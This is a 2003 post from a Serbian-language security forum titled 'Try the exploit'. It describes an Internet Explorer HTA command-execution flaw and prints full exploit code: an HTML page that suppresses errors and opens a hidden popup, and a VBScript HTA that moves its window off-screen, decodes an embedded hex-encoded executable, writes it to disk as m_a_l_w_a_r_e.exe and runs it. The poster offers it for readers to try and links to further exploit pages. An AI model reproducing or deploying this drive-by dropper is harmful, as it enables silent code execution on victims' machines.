Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Probaj exploit

[es] :: Security Coding :: Probaj exploit

[ Pregleda: 4450 | Odgovora: 0 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

StratOS
Slovenija

Član broj: 2234
Poruke: 989
*.dsl.siol.net



+1 Profil

icon Probaj exploit24.09.2003. u 19:59 - pre 249 meseci
IE flaws (security):

Re-evaluating HTML elavation dataSrc command execution
Description: Allows execution of arbitrary commands in Local Zones
Detail: This bug is related to the codebase local path bug, but details the actual issue and runs without scripting or ActiveX enabled
Published: February 28th 2002
Reference:
Example exploit:
Note: See 6th May 2003 Notes.

Notes September 2003:
Renamed and re-added, symptom fixed instead of problem. Now demonstrates how to reach HTA functionality.
Reference: http://msgs.securepoint.com/cgi-bin/get/bugtraq0309/83.html
Example exploit: http://www.malware.com/badnews.html
Example exploit without scripting: http://www.malware.com/greymagic.html
Temporary workaround: Change the mime-type application/hta to something else.

što se dešava ?
Start HTML !
Code:

<script language="JavaScript">
<!--

function SymError()
{
  return true;
}

window.onerror = SymError;

var SymRealWinOpen = window.open;

function SymWinOpen(url, name, attributes)
{
  return (new Object());
}

window.open = SymWinOpen;

//-->
</script>

<script>
  var oPopup = window.createPopup();

  function showPopup() {
    oPopup.document.body.innerHTML = "<object data=badnews.php>";
    oPopup.show(0,0,1,1,document.body);
  }
  
  showPopup()
</script>
 

  <br>
<br>
<br>
<br>
 <center><b> <br>
<br>
<br>
<br>
<br>
<font size="1" color="#f1f1f1" face="system,arial">clear m_a_l_w_a_r_e.exe from C:\</font></b></center>


Nema View Source-a na IE-u, huh
object data=badnews.php

a taj php kad se avtomatski starta hta (application vbs) :
Code:

<title>malware</title>
<script language=vbs>

self.MoveTo 5000,5000

dim v(24)
cut=""

'Hocemo dati koji drugi exe ?
'Necemo

v(0)="4D,5A,44,01,05,y,02,y,20,y,21,y,z2,75,y2,02,y2,99,y3,3E,y3,01,y,FB,30,6A,72,y1C,79,y3,9E,y1CD,66,33,C0,33,z,8C,D3,83,C3,20,B9,70,3F,8E,C3,F3,66,AB,8C,C0,8E,D8,B8,y,A0,8E,C0,C3,66"
v(1)=",B9,y,FA,y2,66,BF,y4,66,BE,81,02,y2,66,33,C0,67,8A,9F,40,01,y2,03,D8,C1,E3,04,2B,D8,2B,D8,66,C1,C8,10,03,D8,AC,03,D8,C1,EB,05,67,88,1F,47,E2,DE,C3,B9,80,3E,33,z,33,F6,F3,66,A5,C3"
v(2)=",1E,06,8C,D8,05,A0,0F,8E,C0,B8,0F,y,8E,D8,33,C0,67,8A,03,8B,F0,BF,0A,y,B9,2C,01,F3,A4,8B,F0,83,C7,14,B9,2C,01,F3,A4,07,1F,C3,B0,13,CD,10,BA,0F,y,8E,DA,BE,48,03,BA,C8,03,32,C0,EE"
v(3)=",42,B9,y,03,F3,6E,E8,5C,z,66,33,DB,E8,B5,z,53,E8,6E,z,BA,DA,03,EC,A8,08,75,FB,EC,A8,08,74,FB,E8,96,z,5B,FE,C3,B4,01,CD,16,74,E0,B8,03,y,CD,10,B8,y,4C,CD,21,yF,B1,C0,90,1D,7B"
v(4)=",88,D9,26,6B,C2,C1,88,B8,C9,A4,3A,8B,7F,93,8E,5C,30,DB,1F,3A,7F,8D,57,33,C1,8C,B1,77,98,89,DA,6B,D7,5C,86,7C,AB,A8,8E,22,D0,D9,A0,5E,85,D9,2E,A2,C3,6C,63,6C,45,24,BF,21,97,8E,D0,8A"
v(5)=",1A,BF,C0,9B,16,26,B2,9D,D7,8A,2D,B3,8C,24,49,A5,8D,29,9F,2D,87,5C,C6,C7,5A,38,97,96,2D,2A,15,CD,A5,73,CC,AE,A6,5D,75,A4,22,B3,9F,8C,D7,77,26,A7,56,B0,B8,64,84,1B,5A,D9,1D,CE,AF,36"
v(6)=",3B,98,7C,C3,38,4C,C0,1A,22,1E,CF,46,79,622,1D,78,D7,CF,6D,DA,7F,6C,A2,25,97,C8,4B,C2,C8,33,70,A5,29,1C,19,BB,A9,69,18,A3,34,9F,51,63,33,1B,3A,7D,57,81,BD,20,A9,D5,23,19,55,4C,55,AA"
v(7)=",62,19,A1,89,23,2B,6B,30,72,92,39,52,94,A8,35,6E,57,CA,CC,C8,CB,9B,C1,71,46,6B,61,6B,2A,7E,71,C7,49,AD,3A,4F,AB,C1,5F,15,67,A7,C4,3C,87,90,59,8A,D7,64,C8,21,BE,1B,6C,90,B0,D8,73,91"
v(8)=",50,75,41,3C,4C,56,D6,3F,A2,2C,1C,B9,65,D8,76,C6,38,B5,51,B9,33,B4,48,64,84,56,A8,A0,AE,1D,9C,C2,1B,83,93,DB,59,54,22,75,70,AF,9E,19,7E,78,34,7D,5D,AA,A1,5E,55,46,BB,BE,14,C5,1A,45"
v(9)=",5E,14,3B,C5,7B,6D,BB,40,81,AD,7A,D2,4A,8E,3D,B4,D6,5C,A9,C6,26,C7,98,58,C6,7D,BB,15,BE,78,CF,C5,74,7C,75,AA,2B,77,25,C1,5F,A7,23,C1,8A,CF,D7,49,55,54,9B,84,8A,55,5D,35,1F,71,25,92"
v(10)=",79,D5,CF,82,2E,23,5D,8B,35,8A,4E,76,1C,C6,7E,26,19,AF,A7,32,38,CE,49,2C2,D0,14,67,39,2D,29,83,33,82,CE,AD,CF,CD,28,1A,1E,38,B0,CE,41,2E,7B,48,4C,2B,D2,92,BD,CB,97,24,B8,39,C2,9C,5A"
v(11)=",D9,D3,63,17,D7,71,18,302,96,67,1C,9E,50,45,58,30,8B,C4,7F,85,9A,4C,C9,58,B3,1F,D3,53,20,24,C9,D6,D0,A8,5A,A1,48,92,7B,D3,70,B2,72,2A,CF,B5,8F,C1,63,2D,1F,6E,1C,B6,B2,C0,2E,B6,26,19"
v(12)=",B5,20,B9,5C,14,3D,C9,2A,51,20,7A,3B,B3,2B,CE,B8,3F,90,A8,2F,CF,4E,CF,68,28,1B,14,BF,6F,A2,1C,85,88,D0,AA,5E,18,B7,1A,1E,C6,7F,D9,94,6D,AC,B5,4C,59,B0,6E,C0,4D,3D,A4,C0,5A,90,65,38"
v(13)=",53,38,61,81,CA,A4,3C,96,28,49,78,86,54,2F,63,2E,42,66,57,28,2B,95,BF,58,5E,51,95,5E,A2,3D,71,C9,A8,CD,AE,C1,54,D4,BC,2A,9C,76,9E,43,9E,84,92,AB,A4,3B,1B,BF,B9,75,65,5E,B3,3C,8C,94"
v(14)=",41,B5,93,B8,59,DB,C2,87,D5,76,60,61,3B,47,A9,15,7E,96,A2,38,60,62,80,9B,2A,5E,CB,A7,6F,47,83,36,82,8F,72,18,37,8F,20,4E,D8,9E,B1,9B,85,3E,A3,70,5F,8A,54,5B,2D,C6,A8,A7,68,8D,94,1E"
v(15)=",44,A4,16,83,BC,99,58,3E,C5,9E,15,4F,9C,78,3A,6A,7F,2A,32,9F,48,30,47,59,6D,3D,AA,48,7D,AE,AF,DB,72,A8,D9,D1,2A,98,B5,49,BC,36,6B,17,45,D2,3E,DB,37,B1,67,80,A0,99,9D,93,89,93,90,88"
v(16)=",90,47,58,65,5A,C4,C8,80,2E,80,A0,8F,77,9A,5E,4F,D3,B3,92,3A,81,1B,4D,CD,2B,D8,A1,5B,9F,63,3E,D6,A7,17,55,7C,73,C9,90,C5,33,85,82,B2,39,78,64,C1,3C,C2,77,80,4D,21,37,96,29,69,4A,C6"
v(17)=",4A,53,C2,65,94,68,54,8C,A7,68,74,40,79,C7,512,63,8E,8D2,92,5B,37,30,722,47,A2,8E,B1,84,51,1D,A2,4B,26,53,58,7C,5C,B1,3A,97,AC,56,B7,C4,42,BC,3F,65,82,yF0,0F,y2,10,y2,11,y2,12,y2,13,y2"
v(18)=",14,y2,15,y2,16,y2,17,y2,18,y2,19,y2,1A,y2,1B,y2,1C,y2,1D,y2,1E,y2,1F,y2,20,y2,21,y2,22,y2,23,y2,24,y2,25,y2,26,y2,27,y2,28,y2,29,y2,2A,y2,2B,y2,2C,y2,2D,y2,2E,y2,2F,y2,30,y2,31,y2"
v(19)=",32,y2,33,y2,34,y2,35,y2,36,y2,37,y2,38,y2,39,y2,3A,y2,3B,y2,3C,y2,3D,y2,3E,y2,3F,y2,3F,y2,3F,y2,3F,01,y,3F,02,y,3F,03,y,3F,04,y,3F,05,y,3F,06,y,3F,07,y,3F,08,y,3F,09,y,3F"
v(20)=",0A,y,3F,0B,y,3F,0C,y,3F,0D,y,3F,0E,y,3F,0F,y,3F,10,y,3F,11,y,3F,12,y,3F,13,y,3F,14,y,3F,15,y,3F,16,y,3F,17,y,3F,18,y,3F,19,y,3F,1A,y,3F,1B,y,3F,1C,y,3F,1D,y,3F"
v(21)=",1E,y,3F,1F,y,3F,20,y,3F,21,y,3F,22,y,3F,23,y,3F,24,y,3F,25,y,3F,26,y,3F,27,y,3F,28,y,3F,29,y,3F,2A,y,3F,2B,y,3F,2C,y,3F,2D,y,3F,2E,y,3F,2F,y,3F,30,y,3F,31,y,3F"
v(22)=",32,y,3F,33,y,3F,34,y,3F,35,y,3F,36,y,3F,37,y,3F,38,y,3F,39,y,3F,3A,y,3F,3B,y,3F,3C,y,3F,3D,y,3F,3E,y,3F2,y,3F2,y,3F2,y,3F2,01,3F2,02,3F2,03,3F2,04,3F2,05,3F2,06,3F2,07,3F2,08"
v(23)=",3F2,09,3F2,0A,3F2,0B,3F2,0C,3F2,0D,3F2,0E,3F2,0F,3F2,10,3F2,11,3F2,12,3F2,13,3F2,14,3F2,15,3F2,16,3F2,17,3F2,18,3F2,19,3F2,1A,3F2,1B,3F2,1C,3F2,1D,3F2,1E,3F2,1F,3F2,20,3F2,21,3F2,22,3F2,23,3F2,24,3F2,25,3F2,26"
v(24)=",3F2,27,3F2,28,3F2,29,3F2,2A,3F2,2B,3F2,2C,3F2,2D,3F2,2E,3F2,2F,3F2,30,3F2,31,3F2,32,3F2,33,3F2,34,3F2,35,3F2,36,3F2,37,3F2,38,3F2,39,3F2,3A,3F2,3B,3F2,3C,3F2,3D,3F2,3E,3F5,3F"

function res(x,y)
    For k = 0 To UBound(v)
        v(k) = Replace(v(k), x, y)
    Next
End Function

res "z", "FF"
res "y", "00"
piece = Split(cut, "/")
cc = 103

For n = 0 To UBound(piece) - 1
    res Chr(cc), piece(n)
    cc = cc + 1
Next

For m = 0 To UBound(v)
    it = it & v(m)
Next


tmp = Split(it, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
pth = "m_a_l_w_a_r_e.exe"
Set f = fso.CreateTextFile(pth, ForWriting)
For i = 0 To UBound(tmp)
    l = Len(tmp(i))
    b = Int("&H" & Left(tmp(i), 2))
    If l > 2 Then
        r = Int("&H" & Mid(tmp(i), 3, l))
        For j = 1 To r
        f.Write Chr(b)
        Next
    Else
        f.Write Chr(b)
    End If
Next
f.Close
Set shell=CreateObject("WScript.Shell")
shell.run(pth)


</script>


FileSystemObject u vbs-u tu kreira novi text file (CreateTextFile)
ako nemamo koji AV, avtomatsko starta *.exe
treba josh samo rijesiti sa file exist i stvar (break) kod skripta je rijesen.



-------------------------------------
Broj 2. Neco u tome sto se dogada ...
http://computerbytesman.com/security/notepadpopups.htm
-------------------------------------
Broj 3.
>http://www.malware.com/once.again!.html<
PAZI:Url je izmedzu >< tagovi [ url ] ne pomazu
IFRAME poznati, mozemo da ga i promenimo ... kako ...
-------------------------------------
Broj 4.
Imate li updatovan/patchovan browser
http://home.austin.rr.com/wiredgoddess/thepull/funRun.html
--------------------------------------
Broj 5.
FileChecker
http://jscript.dk/Jumper/xploit/scriptsrc.html
--------------------------------------
Pozdrav StratOS
"Multitasking - ability to f##k up several things at once."
"It works better if you plug it in."
"As a rule, software systems do not work well until they have been used, and have failed repeatedly, in real applications."
"The one who is digging the hole for the other to fall in is allready in it."
 
Odgovor na temu

[es] :: Security Coding :: Probaj exploit

[ Pregleda: 4450 | Odgovora: 0 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.